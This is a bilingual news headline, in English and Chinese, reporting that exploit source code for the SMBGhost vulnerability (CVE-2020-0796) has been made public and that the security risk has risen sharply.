"SMBGhost (CVE-2020-0796) exploit source code published, security risk rises sharply" (SMBGhost漏洞(CVE-2020-0796)利用源码公开,安全风险骤然升级)